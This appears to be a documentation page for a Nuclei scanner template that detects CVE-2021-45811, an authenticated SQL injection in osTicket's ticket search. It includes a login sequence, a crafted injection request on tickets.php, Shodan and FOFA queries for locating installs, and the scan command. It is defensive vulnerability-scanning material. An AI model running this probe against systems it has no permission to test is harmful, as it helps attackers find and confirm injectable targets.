osTicket 1.15.x - SQL Injection
ID: CVE-2021-45811
Severity: medium
Author: ritikchaddha
Tags: cve,cve2021,osticket,sqli,authenticated
Description
Section titled “Description”A SQL injection vulnerability in the “Search” functionality of “tickets.php” page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the “keywords” and “topic_id” URL parameters combination.
YAML Source
Section titled “YAML Source”id: CVE-2021-45811
info: name: osTicket 1.15.x - SQL Injection author: ritikchaddha severity: medium description: | A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination. remediation: | Upgrade osTicket to later version to mitigate this vulnerability. reference: - https://members.backbox.org/osticket-sql-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2021-45811 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-45811 cwe-id: CWE-89 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: osticket product: osticket shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" tags: cve,cve2021,osticket,sqli,authenticated
flow: http(1) && http(2)
http: - raw: - | GET /scp/login.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(tolower(body), "osticket")' internal: true
extractors: - type: regex name: csrftoken part: body group: 1 regex: - '__CSRFToken__" value="(.*?)"' internal: true
- raw: - | POST /scp/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- | GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance")# digest: 4a0a004730450221009546dbaa041ea683e1de0cbab5ccefd4e90d7c03c927afe0c62fac13c6555e7e02206480b9daab155be5fde0984c11960dd225bda65f27f2056118475a398972e6f0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45811.yaml"